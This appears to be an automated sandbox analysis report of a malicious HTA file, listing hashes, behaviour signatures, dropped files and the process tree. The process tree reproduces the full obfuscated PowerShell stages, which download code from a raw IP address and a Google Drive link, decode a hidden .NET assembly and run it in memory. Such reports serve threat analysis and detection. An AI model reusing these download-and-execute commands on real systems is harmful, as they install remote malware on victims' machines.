Analysis
-
max time kernel
91s -
max time network
97s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
30-10-2024 07:23
Static task
static1
Behavioral task
behavioral1
Sample
greatthingswithmegood.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
greatthingswithmegood.hta
Resource
win10v2004-20241007-en
General
-
Target
greatthingswithmegood.hta
-
Size
169KB
-
MD5
d61ef0038de65f697abb0b7a21b499db
-
SHA1
f8facfa18bf5eeecaa0601e8c1690fe60fe02ff8
-
SHA256
8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93
-
SHA512
3ce0e7e8302d6b6c23ea209b07640be3b616306494d065c0293885bed194002f92bc41f4329f18465dd0ad77087afa6ce5a30a585e422f08a017306040986223
-
SSDEEP
48:4vaw5oZz7eWLB2rQOyeoCKcxyeoCKnAWUSl+WmpCzc/xJUdPePmkee7+SfitTFmE:4vG172ICeC4lw/HwSCirCtgQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2276 POWeRSHell.eXE 6 3056 powershell.exe 8 3056 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2308 powershell.exe 3056 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2276 POWeRSHell.eXE 3044 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWeRSHell.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2276 POWeRSHell.eXE 3044 powershell.exe 2276 POWeRSHell.eXE 2276 POWeRSHell.eXE 2308 powershell.exe 3056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2276 POWeRSHell.eXE Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2608 wrote to memory of 2276 2608 mshta.exe 29 PID 2608 wrote to memory of 2276 2608 mshta.exe 29 PID 2608 wrote to memory of 2276 2608 mshta.exe 29 PID 2608 wrote to memory of 2276 2608 mshta.exe 29 PID 2276 wrote to memory of 3044 2276 POWeRSHell.eXE 31 PID 2276 wrote to memory of 3044 2276 POWeRSHell.eXE 31 PID 2276 wrote to memory of 3044 2276 POWeRSHell.eXE 31 PID 2276 wrote to memory of 3044 2276 POWeRSHell.eXE 31 PID 2276 wrote to memory of 2712 2276 POWeRSHell.eXE 32 PID 2276 wrote to memory of 2712 2276 POWeRSHell.eXE 32 PID 2276 wrote to memory of 2712 2276 POWeRSHell.eXE 32 PID 2276 wrote to memory of 2712 2276 POWeRSHell.eXE 32 PID 2712 wrote to memory of 2792 2712 csc.exe 33 PID 2712 wrote to memory of 2792 2712 csc.exe 33 PID 2712 wrote to memory of 2792 2712 csc.exe 33 PID 2712 wrote to memory of 2792 2712 csc.exe 33 PID 2276 wrote to memory of 1740 2276 POWeRSHell.eXE 35 PID 2276 wrote to memory of 1740 2276 POWeRSHell.eXE 35 PID 2276 wrote to memory of 1740 2276 POWeRSHell.eXE 35 PID 2276 wrote to memory of 1740 2276 POWeRSHell.eXE 35 PID 1740 wrote to memory of 2308 1740 WScript.exe 36 PID 1740 wrote to memory of 2308 1740 WScript.exe 36 PID 1740 wrote to memory of 2308 1740 WScript.exe 36 PID 1740 wrote to memory of 2308 1740 WScript.exe 36 PID 2308 wrote to memory of 3056 2308 powershell.exe 38 PID 2308 wrote to memory of 3056 2308 powershell.exe 38 PID 2308 wrote to memory of 3056 2308 powershell.exe 38 PID 2308 wrote to memory of 3056 2308 powershell.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithmegood.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\windOWSPowerShell\V1.0\POWeRSHell.eXE"C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_0th7eoa.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC889.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2792
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51b6ed0be8a713b68e85bef96b588153e
SHA16c00a159afc31259931034fba3b34c78d88e61fd
SHA2565c97bd8b5807ec2b8bd322a6ec06108979d1f97def7fae5a1b2f017e04332542
SHA51209c1e0c806631c18f7b4c7cff25a13472e6ee0d4bd2d217787033577ac465265221bf6ed75351bb49010e4e12258cc9ccdd57c72a8b8caefe9de91ef976602cc
-
Filesize
3KB
MD5b3c012dcb1fe9c3b557c6d994b172c65
SHA1ea0e832bcc203abd17d03817809066f8c024f30b
SHA2560706963d4e43097a5694ca261ccde9fd5ec0699095652779c92cfaf03efdea3e
SHA5128b620c5157b57378f89424c79fb4296f984fbdaa7b81fef97606768fd2778b0d59846465063607dc06e3f5f998ad6857e7792b446eab37f67b67470ec2c42094
-
Filesize
7KB
MD5591e095fbd0ddc938e1ec896c1d9d277
SHA151a9f67e311108f66df5dc967546158992f47487
SHA2567b80486f5356e7c294f6b9ed9b328b054139e656f2fe9fafe245e257bee478e8
SHA512a9ff902c1feab0f996d6c78bd87ca2fc12d80228fae8f17ef559e30a6f93f594a3c87b85929fa686a94dc84f74a338c92d49c48abcfd5febad06dc9fd4b61d14
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD564e56e1593feaf351b31ee4fe1505e96
SHA180422ac5cb70fc08df7143a382dd055d5db134c9
SHA256ff80ed35e241ba8c384d5f3d6dc830551312aa4bb081ba4168d09595facab7df
SHA5122e70fa7af57a3426f97fec2e72c4f8127dd947ba306d1b54cc180026411a326636950ba3708288ee542789336fd394f453db9af210d38481d98fa215d7053ca4
-
Filesize
138KB
MD564cc9748329c0e186cacd10d639615e6
SHA11291f245b185bd05fb09646b79f284d76e7dc0ff
SHA2562c5fffa8231f572e3a34b8d4ca675aec062c3accfe661519a28e376605c0479d
SHA51265ccbfe0223b58675aef7de997229f3ba66be892c851d6cec9018b941f3a5c5cac3c41fbe1878474213293ad25059b06e7ff7f0c4e3320d75a6fa7f071b646ba
-
Filesize
652B
MD5d3b474da9beb6e2dd3d386f424a5db97
SHA1be1b1c25adb21ace2bd9edcef1d9e57b04984cc0
SHA256ad7e3d9472113d3bf182a1f5f51e7e72f3bb254a90820efec9da43ece7a231b9
SHA512b3406e644cce69c0ddaeda9adc264c5711f99f7ee335411ea562826c3709f48d343064bc3bfcb605434e4b99575b2569a738e929dcbdf916784617dd90add82f
-
Filesize
487B
MD58165df8b1b6d49c15b5e65811de25b8c
SHA1fbe4fe188254b23c8b57b8d1bcd56011a93f34ba
SHA256063172ff26517cdf762b144b713c24d423f75c6493234773c0e241c060dfa9f9
SHA512ede5171453ece61e25baf3eef0a842e92a2b2c47c06bd4ed416f9c0a42e2bbc29f1810b97e4041dcdfd53995fc0e268f20a39188db553cf272b0374994473a2d
-
Filesize
309B
MD58cbb4584ddac1f856aa7ba8002689266
SHA1bb504f68be0a3d65a27d7f5d0ef74c3bfbe709a5
SHA25648bcb8d5dc5e95713681571ce91e697433330b34ca80c7c5b8fc8a4c5def9c7b
SHA51271604f0fc047b478bf7c43a3d6098435e2bb22d4ff3d0648b1e3460ab75fec0efb06b3e6a5230c24b366c9b266e3e6bb30c7ac1ac2a23d5915b4b64dbd99f638